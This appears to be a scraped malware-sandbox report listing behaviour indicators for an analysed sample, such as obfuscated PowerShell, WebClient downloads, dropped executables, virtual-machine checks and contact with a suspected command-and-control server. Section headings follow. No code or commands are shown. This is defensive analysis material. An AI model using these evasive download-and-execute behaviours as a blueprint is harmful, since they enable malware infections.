Probably obfuscated PowerShell command line is found

Reads security settings of Internet Explorer

Starts POWERSHELL.EXE for commands execution

Probably download files using WebClient

Powershell scripting: start process

Gets or sets the security protocol (POWERSHELL)

Block-list domains

Process requests binary or script from the Internet

Runs shell command (SCRIPT)

Writes data into a file (POWERSHELL)

Executable content was dropped or overwritten

Potential Corporate Privacy Violation

The process checks if it is being run in the virtual environment

Contacting a server suspected of hosting an CnC

Connects to unusual port

Loads DLL from Mozilla Firefox

Searches for installed software

INFO

The process uses the downloaded file

Reads security settings of Internet Explorer

Reads Internet Explorer settings

Reads the software policy settings

Create files in a temporary directory

Checks proxy server information

Disables trace logs

Sends debugging messages

The executable file from the user directory is run by the Powershell process

Checks supported languages

Reads the computer name

Manual execution by a user

Reads the machine GUID from the registry

Malware configuration

Static information

TRiD

EXIF

ZIP

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules